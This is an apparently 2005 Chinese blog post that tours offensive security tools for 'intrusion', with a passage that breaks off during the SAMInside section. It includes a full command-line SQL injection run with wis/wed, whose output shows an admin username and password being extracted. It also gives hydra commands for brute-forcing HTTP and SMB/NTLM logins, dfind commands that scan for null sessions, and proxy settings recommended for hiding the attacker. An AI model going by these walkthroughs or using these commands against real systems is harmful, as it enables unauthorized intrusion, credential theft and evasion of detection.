谁主沉浮 N款安全类软件横向介绍

430 views

分类 : 技术文摘 | 发布时间 : 06-08-2005

关键词: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

一、前言

依稀记得,N年前第一次学习黑客技术的时候还是从一个叫letmein的工具开始的,现在恐怕没有几个人在用了。安全在发展,工具也在不断地更新。每个时代都有自己代表性的东西,安全也不例外。在现如今的网络安全界,安全工具漫天飞舞,我们也许还在犹豫到底该用哪一个。这次就让我从使用者的立场上,为大家做一次介绍吧。

二、扫描工具身先行

一说到安全,每一个人第一个想到的也许就是扫描了。不错,在入侵前期的信息采集与目标踩点工作中,扫描工具起到了很大的作用。以前大家在win下都用流光和xscan,在*nix下是nmap和nessus,这些都是经典的老牌工具了,在这里我就不多说了。这次我给大家介绍的是一些新的扫描工具。
第一个上台的就是N—stealth。这是一款win平台下的HTTP 安全扫描工具,我手头里的版本是3.5 build 62。它可以检测超过19000个漏洞,是一款非常不错的安全审计工具。
运行界面如图一,是一个英文版的工具。


界面非常简洁,左侧三个按钮依次是扫描、IDS测试和数据库。第一个毫无疑问是工具的主体。选择后,在右面就会相应出现扫描选项卡。
在第一个scanner选项卡中,我们可以指定欲扫描的目标ip和web端口。如图二。


第二个选项卡 vulnerability detection就是扫描选项了,如图三。


一般不必选择IDS躲避,因为这样会影响扫描结果。同时点击下方的special options按钮,进行更详细地设置。如图四,大部分选项都是默认选择的,如果你对英文不是很感冒的话可以不去理会按照默认选项就可以了。回到扫描选项上,我们最后要看的是preference选项卡,大部分解释我都在图中给出了。


出于对自身安全的考虑,我还是强烈建议大家使用代理来扫描。几个重要的选项卡都介绍完了,如果你在vulnerability detection选项卡中指定了IDS evation,那么我们还需要在右面点选IDSTEST按钮,进入IDS TEST选项设置,如图六。


一般情况下保持默认设置即可。最后一个按钮database主要是对漏洞库进行维护的,可以通过它进行漏洞库的更新等操作。
OK!主要选项都介绍完了,下面该领略一下它的风采了。如图七

谈到web安全我们就不得不说说sql injection漏洞,这个可是如今最盛行的攻击方式了。提到了sql injection我又不得不说说NBSI2 sql injection扫描工具。这是一款集sql 注入漏洞扫描和破解于一身的asp安全审计工具。运行界面如图八。


该工具完全是made in china,所以不存在语言障碍问题哦。网上有关此工具的使用方法很多,因此我就简单得介绍一下吧。从上面一排按钮开始看一下,网站扫描可以对一个地址进行sql注入漏洞检测。而注入分析功能则是该工具的重头戏,它可以通过get或者post方式进行sql injection漏洞的分析,如果发现存在漏洞,则可以进一步进行表名列名等的猜解。在扫描及工具按钮的下拉菜单里有几个非常有用的工具,其中nb command命令执行器和treelist目录列表工具是目前可用的。使用非常简单,大家一看便可知道。
需要强调的是NBSI2这个工具是针对asp脚本注入漏洞设计的,那么对于PHP我们就没有工具可以用了吗?答案是否定的,如图九。

这同样是一款made in china的工具,完全的中文界面一看就会用。由于我手里的版本是免费版有一定的功能限制,只能暴取文件代码,不过这个功能对于我们来说已经足够了。
对于喜欢命令行的朋友来说,我推荐给大家一套组合工具,这套工具是同样是针对asp脚本注入漏洞设计的。该套工具包含两个小工具,wed和wis。这套工具是由netXeyes开发的。
使用起来也是非常的简单。首先我们需要利用wis工具对一个站点进行注入点的扫描。其过程如下:
C:\>wis http://www.someaspsite.com/

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com
 

Scanning http://www.someaspsite.com/, Page: Unlimited
Patient, Please….

(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204

Injection Page Final Result:
============================
/shownews.asp?newsid=204

发现注入点后我们再利用wed进行管理员帐户的猜解。过程如下:

C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=204

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com, security@vip.sina.com

#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened

#### Phrase 1: Process Argv ####
Host:www.someaspsite.com
Page:/shownews.asp?newsid=204

#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.

#### Phrase 3: Get Cookies ####
Tag: 2017
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/

#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is “users”

#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is “name”

#### Phrase 6: Starting Get Length of Field “name” ####
Tag: 24
Got Length of Field “name” is: 13

#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is “pwd”

#### Phrase 8: Starting Get Length of Field “pwd” ####
Tag: 24
Got Length of Field “pwd” is: 9

#### Phrase 9: Starting Brute Field “name” and “pwd” (Access Mode) ####

name is: administrator
pwd is: admin@bvn

C:\>

到这里我们基本完成了一次sql injection入侵,当然我们还可以利用wis工具寻找后台登陆页面,如下:
C:\>wis http://www.someaspsite.com/ /A

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please….

(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp

Access Page Final Result:
============================
/gansu2/login.asp (200 OK)

Scan Finished

C:\>

是不是很简单?到底选用命令行还是图形界面,这个就是读者自己的选择了。

最后要介绍的一款扫描工具就是dfind了。这个工具是我最喜欢的工具之一。运行界面如下:
E:\mfm\exploit>dfind
Usage: DFind <Option> [THREADS]

<Option>:
-p <Port> <IP IP> ………. Scan one port on iprange //扫描一段ip中的特定端口
+p <Port> <IP IP> ………. Scan iprange,+logs ok,refused connections //扫描一段ip中拒绝连接的地址
-p <Port , Port
> <IP IP> … Scan two ports on iprange //在一段ip中扫描两个端口,用逗号分隔
-p <Port Port> <IP> …….. Scan a portrange on ip//在特定ip上扫描指定范围的端口
+p <Port Port> <IP> …….. Scan portrange,+logs ok,refused connections //在特定ip上扫描决绝连接的端口
-ban <Port Port> <IP> …….. Scan portbanners on ip //抓取指定ip的端口标示
-ban <Port> <IP IP> ………. Scan portbanners on iprange //扫描指定ip范围内的端口标示
-cgi <IP> ……………….. Scan cgi hole //扫描cgi漏洞
+ipc <IP IP> …………….. Scan IPC$ null on 139 & 445 //扫描IPC空连接
-ipc <IP IP> …………….. Scan IPC$ null on 139 //同上
-ipc2 <IP IP> …………….. Scan IPC$ null on 445 //同上
-iis <IP IP> …………….. Scan IIS webservers versions //扫描iis 服务器版本
-iis2 <IP IP> …………….. Scan IIS write permissions hole //扫描IIS 可写入漏洞
-apa <IP IP> …………….. Scan Apache webservers //扫描apache服务器
-wdv <IP IP> …………….. Scan WebDav on IIS5.0 //扫描IIS5.0上的webdav
//以下为特定漏洞的扫描选项,我就不多解释了。可以去搜索引擎中查找相关漏洞说明

-hpj <IP IP> …………….. Scan HP Web JetAdmin
-msa <IP IP> …………….. Scan MSADC on webservers /
-ccb <IP IP> …………….. Scan CCBill whereAmi
-med <IP IP> …………….. Scan WMedia on webservers
-php <IP IP> …………….. Scan phpBB on webservers
-php2 <IP IP> …………….. Scan PHP-Nuke on webservers
-pso <IP IP> …………….. Scan PSOProxy Server
-fro <IP IP> …………….. Scan frontpage host
-rea <IP IP> …………….. Scan RealServer component
-htr <IP IP> …………….. Scan +.htr hole
-pri <IP IP> …………….. Scan .printer host
-uni <IP IP> …………….. Scan unicode hole
-idq <IP IP> …………….. Scan .idq host
-cod <IP IP> …………….. Scan codered virus hole
-opx <IP IP> …………….. Scan OptixPRO v1.0 => 1.32(include) hole
-rad <IP IP> …………….. Scan Radmin 2.1 Auth,NTAuth,NULL session
-sql <IP IP> …………….. Scan MS SQL Servers for weak access
-req <REQ IP IP> …………. Scan File/Dir Request on webservers

上面 “//”后面是我添加的注释内容,这是0.81版的dfind。看完说明,我相信你看到了这个工具的强大之处,再加上本身体积上的优势(只有20几K)这个工具必将成为一款必备工具。比如我们来扫一下我所在内网部分ip段的空ipc连接,输入E:\mfm\exploit>dfind -ipc 10.1.0.1 10.1.0.54
扫描完成,在同目录下生成一个名为dfind的无后缀文件。用type命令即可察看.


三、破解工具也疯狂

网络安全中最暴力的是什么?大家也许会异口同声地说:“破解!”。不错,破解往往被很多高手所不齿,尤其是暴力破解很多人都认为这是无能的表现。但是破解有的时候却是入侵中唯一且有效的方法。
远程破解相信大家都用过,我首推hydra。这是一款*nix平台下的远程登陆密码破解工具。它支持TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL, MYSQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, SMTP-AUTH, SSH2, SNMP, CVS, Cisco AAA众多登陆方式的密码破解。按照说明文件大家可以很容易地进行程序的编译。为了照顾那些windows的用户,在cygwin下编译出了win版本的hydra。我也将以win下的hydra作为介绍。
运行时说明如下:
E:\mfm\exploit\hydra>hydra
Hydra v4.3 [http://www.thc.org] (c) 2004 by van Hauser / THC <vh@thc.org>

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R 恢复先前中断的会话
-S 通过SSL连接
-s PORT 如果服务端口不是默认的,在这里指定服务端口
-l LOGIN or -L FILE 指定LOGIN登陆帐户,或者是一个包含很多帐户的FILE文件
-p PASS or -P FILE 指定欲使用的密码文件
-e ns 附加选项,”n” 检查空口令, “s” 尝试帐户名和密码相同检查
-C FILE 指定一个包含“login:pass”格式的文件,用以取代-L和-P选项。
-M FILE 指定目标地址文件,一行一个地址。
-o FILE 将找到的帐户和密码记录到指定的文件中
-f 在找到第一个帐户和密码对后结束探测
-t TASKS 指定线程数 (默认是 16)
-w TIME 指定响应最大等待时间(以秒为单位默认是 30)
-v / -V 详细显示模式
server 指定目标地址
service 要破解的服务,支持的有: [telnet ftp pop3 imap smb
smbnt http https http-proxy cisco cisco-enable ldap mssql mysql nntp vnc socks5
rexec snmp cvs icq pcnfs sapr3 ssh2 smtp-auth]
OPT 有些服务模块需要特定信息

我已经尽力将英文原版说明给大家翻译过来了。相信大家应该能看得懂的。
需要说明一点的是上面的OPT可以是如下的值:
service module optional parameter
============== =================================================
www / http / ssl / https
指定验证页面可以是类似如下的值:
Value can be “/secret” or “http://bla.com/foo/bar” or
“https://test.com:8080/members”
http-proxy 指定验证页面(可选,默认是http://www.suse.com/)
smbnt 值[L,LH,D,DH,B,BH] (REQUIRED)
(L) 检测本地帐户 (D) 域帐户 (B)两者选其一
(H) NTLM 散列
ldap 指定DN (可选, 可以使用-l选项指定)
cisco-enable specified the logon password for the cisco device (REQUIRED)
sapr3 specified the client id, a number between 0 and 99 (REQUIRED)

我只翻译了我认为比较重要的地方,如果还不能理解的话我们来看几个例子吧。
我们想破解一个http登陆页面,登陆帐户是superlone,密码文件在当前目录中pass.txt,目标地址为www.attack.com,那么此工具的命令行为:
hydra -l superlone -P pass.txt www.attack.com http /members/

再比如我们要破解nt.microsoft.com上的本地帐户和NTLM密码散列,我们可以这样:
hydra -m LH -l administrator -P sam.dump nt.microsoft.com smbnt
同过上面的两个例子,读者应该会用这个工具了吧。在破解的时候可以随时按下ctrl+c组合键来终止猜解,下次想继续猜解得时候可以使用hydra –R来继续上次的猜解过程。
对于http/www服务的猜解我们可以指定代理服务器。方法是指定环境变量:
HYDRA_PROXY_HTTP为指定的代理地址。比如:
E:\mfm\exploit\hydra> set HYDRA_PROXY_HTTP=”http://222.124.114.10:8080/”

如果想为其它的服务也使用代理,那么需要指定HYDRA_PROXY_CONNECT值为代理地址。比如:
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
如果代理服务器需要验证的话可以指定如下的环境变量值为指定帐户和密码:
HYDRA_PROXY_AUTH=”the_login:the_password”

到这里这款工具基本上就介绍完了。不知道读者看过后会有怎么样的想法,也许和我一样为它的强大功能而叫好吧?
介绍了远程,本地的肯定也不能拉下。估计说到这里肯定大家都会说本地的用lc地球人都知道。不错lc作为一款本地密码破解工具,确实非常强大也是众多黑家必备的工具了。然而今天我要介绍的是一款新软件—saminside,先看一下界面吧图十


看上去好像简单了点,点击第一个

你也许还想了解这些

Post a comment

无觅相关文章插件,快速提升流量